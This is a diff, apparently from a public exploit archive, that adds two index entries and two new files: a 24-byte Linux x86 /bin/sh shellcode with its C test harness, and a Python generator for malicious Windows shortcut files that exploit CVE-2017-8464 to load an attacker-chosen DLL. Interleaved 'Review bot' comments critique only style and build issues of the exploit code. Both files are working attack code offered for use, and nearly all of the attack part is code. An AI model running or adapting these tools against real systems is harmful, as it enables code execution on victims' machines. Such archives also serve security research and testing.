diff --git a/files.csv b/files.csv
index f8d963b58..b7fda7a1f 100644
--- a/files.csv
+++ b/files.csv
@@ -9173,6 +9173,7 @@ id,file,description,date,author,platform,type,port
 42424,platforms/linux/local/42424.py,"DNSTracer 1.9 - Buffer Overflow",2017-08-03,j0lama,linux,local,0
 42425,platforms/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
 42426,platforms/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
+42429,platforms/windows/local/42429.py,"Microsoft Windows - LNK Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -16372,6 +16373,7 @@ id,file,description,date,author,platform,type,port
 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
 42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
+42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
diff --git a/platforms/lin_x86/shellcode/42428.c b/platforms/lin_x86/shellcode/42428.c
new file mode 100755
index 000000000..390e4fa04
--- /dev/null
+++ b/platforms/lin_x86/shellcode/42428.c
@@ -0,0 +1,65 @@
+/*
+;Title: Linux/x86 - /bin/sh Shellcode
+;Author: Touhid M.Shaikh
+;Contact: https://github.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86
+;Description: This shellcode baased on stack method to Execute "/bin//sh".
+Length of shellcode is 24 bytes.
+;Tested on : 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09
+
+
+
+===COMPILATION AND EXECUTION===
+
+#nasm -f elf32 shell.asm -o shell.o <=== Making Object File
+
+#ld -m elf_i386 shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+section .text
+global _start
+_start:
+xor eax,eax
+cdq
+push eax
+push 0x68732f2f
+push 0x6e69622f
+mov ebx,esp
+push eax
+push ebx
+mov ecx, esp
+mov al,0x0b
+int 80h
+
+===================END HERE============================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include
+#include
+
+
+unsigned char code[] = \
+"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+printf("Shellcode Length: %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
diff --git a/platforms/windows/local/42429.py b/platforms/windows/local/42429.py
new file mode 100755
index 000000000..6da81e2b0
--- /dev/null
+++ b/platforms/windows/local/42429.py
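Review bot: The two `#include` directives just after the closing `*/` name no header, so the file as shown here does not compile; `printf` and `strlen` in `main` need `<stdio.h>` and `<string.h>`, and since angle-bracketed text appears to have been stripped in rendering elsewhere in this commit, the raw file should be checked rather than assumed. `main()` relies on implicit int, which C99 removed; `int main(void)` with a closing `return 0;` keeps the harness building under a modern default `-std`. The header comment lists the gcc flags but not why they are needed; a line such as `/* -z execstack: code[] lives in a data segment that is non-executable by default, so the call through ret faults without it */` would tell a reader what the crash they otherwise see means, and `-fno-stack-protector` looks unrelated to this particular harness (no stack buffer is written) and could be dropped from the instructions after confirming.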
@@ -0,0 +1,245 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- + +# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability +# CVE : 2017-8464 +# Authors : [ykoster, nixawk] +# Notice : Only for educational purposes. +# Support : python2 + +import struct + + +def generate_SHELL_LINK_HEADER(): + # _________________________________________________________________ + # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | + # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1| + # ----------------------------------------------------------------- + # | HeaderSize | + # ----------------------------------------------------------------- + # | LinkCLSID (16 bytes) | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | LinkFlags | + # ----------------------------------------------------------------- + # | FileAttributes | + # ----------------------------------------------------------------- + # | CreationTime | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | AccessTime | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | WriteTime | + # ----------------------------------------------------------------- + # | ... 
| + # ----------------------------------------------------------------- + # | FileSize | + # ----------------------------------------------------------------- + # | IconIndex | + # ----------------------------------------------------------------- + # | ShowCommand | + # ----------------------------------------------------------------- + # | HotKey | Reserved1 | + # ----------------------------------------------------------------- + # | Reserved2 | + # ----------------------------------------------------------------- + # | Reserved3 | + # ----------------------------------------------------------------- + + shell_link_header = [ + b'\x4c\x00\x00\x00', # "HeaderSize" : (4 bytes) + b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46', # "LinkCLSID" : (16 bytes) HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046} + b'\x81\x00\x00\x00', # "LinkFlags" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode + b'\x00\x00\x00\x00', # "FileAttributes" : (4 bytes) + b'\x00\x00\x00\x00\x00\x00\x00\x00', # "CreationTime" : (8 bytes) + b'\x00\x00\x00\x00\x00\x00\x00\x00', # "AccessTime" : (8 bytes) + b'\x00\x00\x00\x00\x00\x00\x00\x00', # "WriteTime" : (8 bytes) + b'\x00\x00\x00\x00', # "FileSize" : (4 bytes) + b'\x00\x00\x00\x00', # "IconIndex" : (4 bytes) + b'\x00\x00\x00\x00', # "ShowCommand" : (4 bytes) + b'\x00\x00', # "HotKey" : (2 bytes) + b'\x00\x00', # "Reserved1" : (2 bytes) + b'\x00\x00\x00\x00', # "Reserved2" : (4 bytes) + b'\x00\x00\x00\x00', # "Reserved3" : (4 bytes) + ] + + return b"".join(shell_link_header) + + +def generate_LINKTARGET_IDLIST(path, name): + # _________________________________________________________________ + # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | + # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1| + # ----------------------------------------------------------------- + # | IDListSize | IDList(variable) | + # 
----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + + # IDList = ItemID + ItemID + ... + TerminalID + # ItemID = ItemIDSize + Data + + def generate_ItemID(Data): + itemid = [ + struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data) + Data + ] + # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data) + + # return ItemIDSize + Data + + return b"".join(itemid) + + def generate_cpl_applet(path, name=name): + name += b'\x00' + path += b'\x00' + + bindata = [ + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00', + struct.pack('H', len(path)), + struct.pack('H', len(name)), + path.encode('utf-16')[2:], + name.encode('utf-16')[2:], + b"\x00\x00" # comment + ] + + return b"".join(bindata) + + idlist = [ + # ItemIDList + + generate_ItemID(b'\x1f\x50\xe0\x4f\xd0\x20\xea\x3a\x69\x10\xa2\xd8\x08\x00\x2b\x30\x30\x9d'), + generate_ItemID(b'\x2e\x80\x20\x20\xec\x21\xea\x3a\x69\x10\xa2\xdd\x08\x00\x2b\x30\x30\x9d'), + generate_ItemID(generate_cpl_applet(path)), + + b'\x00\x00', # TerminalID + ] + + idlist = b"".join(idlist) + idlistsize = struct.pack('H', len(idlist)) + + linktarget_idlist = [ + idlistsize, + idlist, + ] + + return b"".join(linktarget_idlist) + + +def generate_EXTRA_DATA(): + # ExtraData refers to a set of structures that convey additional information about a link target. These + # optional structures can be present in an extra data section that is appended to the basic Shell Link + # Binary File Format. 
+ + # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK + + # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS / + # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS / + # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS / + # SHIM_PROPS / SPECIAL_FOLDER_PROPS / + # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS + + # SpecialFolderDataBlock + + # _________________________________________________________________ + # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | + # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1| + # ----------------------------------------------------------------- + # | BlockSize | + # ----------------------------------------------------------------- + # | BlockSignatire | + # ----------------------------------------------------------------- + # | SpecialFolderID | + # ----------------------------------------------------------------- + # | Offset | + # ----------------------------------------------------------------- + + extra_data = [ + b'\x10\x00\x00\x00', + b'\x05\x00\x00\xA0', + b'\x03\x00\x00\x00', + b'\x28\x00\x00\x00', + b'\x00\x00\x00\x00' # TERMINAL_BLOCK + ] + + return b"".join(extra_data) + + +def ms_shllink(path, name=b"Microsoft"): + '''build Shell Link (.LNK) Binary File Format''' + + lnk_format = [ + + # Structures + + # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO] + # [STRING_DATA] *EXTRA_DATA + + + # SHELL_LINK_HEADER: + # A ShelllinkHeader structure which contains identification information, timestamps, and + # flags that specify the presence of optional structures. + + generate_SHELL_LINK_HEADER(), + + # LINKTARGET_IDLIST: + # An optional LinkTargetIDList structure, which specifies the target of the link. The + # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader. + # + # + + generate_LINKTARGET_IDLIST(path, name), + + # LINKINFO: + # An optional LinkInfo structure, which specifies information necessary to resolve the link target. 
+ # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader. + + # STRING_DATA: + # Zero or more optional StringData structures, which are used to convey user interface and path + # identification information. The presence of these structures is specified by bits in the ShellLinkHeader. + + # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR] + # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION] + + # EXTRA_DATA: + # Zero or more ExtraData structures + + generate_EXTRA_DATA() + ] + + return b"".join(lnk_format) + + +if __name__ == '__main__': + import sys + + if len(sys.argv) != 3: + print("[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability") + print("[*] Usage: %s " % sys.argv[0]) + sys.exit(0) + + lnkpath = sys.argv[1] + dllpath = sys.argv[2] + + bindata = ms_shllink(path=dllpath) + + with open(lnkpath, 'wb') as lnkf: + lnkf.write(bindata) + + +## References + +# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464 +# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx +# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf +# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf +# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files +# 6. https://twitter.com/mkolsek/status/877499744704237568 +# 7. https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g +# 8. https://github.com/rapid7/metasploit-framework/pull/8767 \ No newline at end of file
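Review bot: In the `__main__` block near the end of the hunk, the usage line `print("[*] Usage: %s " % sys.argv[0])` names no arguments as shown (if angle-bracketed placeholders were stripped in rendering, as appears to have happened elsewhere in this commit, confirm against the raw file), and `sys.exit(0)` reports success on a usage error where `sys.exit(2)` is the convention. `ms_shllink`'s one-line docstring is the only parameter documentation in the file; it should state that `path` and `name` are bytes, that `name` is only consumed as the default argument of the nested `generate_cpl_applet`, and that the bytes/`.encode('utf-16')` mix is what pins the script to Python 2 as the header claims. `generate_ItemID` still carries two commented-out lines (`# ItemIDSize = struct.pack(...)`, `# return ItemIDSize + Data`) that duplicate the live code and should be deleted. The comment typos `ShelllinkHeader` and `BlockSignatire` should read ShellLinkHeader and BlockSignature to match the MS-SHLLINK names they cite, and the file lacks a trailing newline.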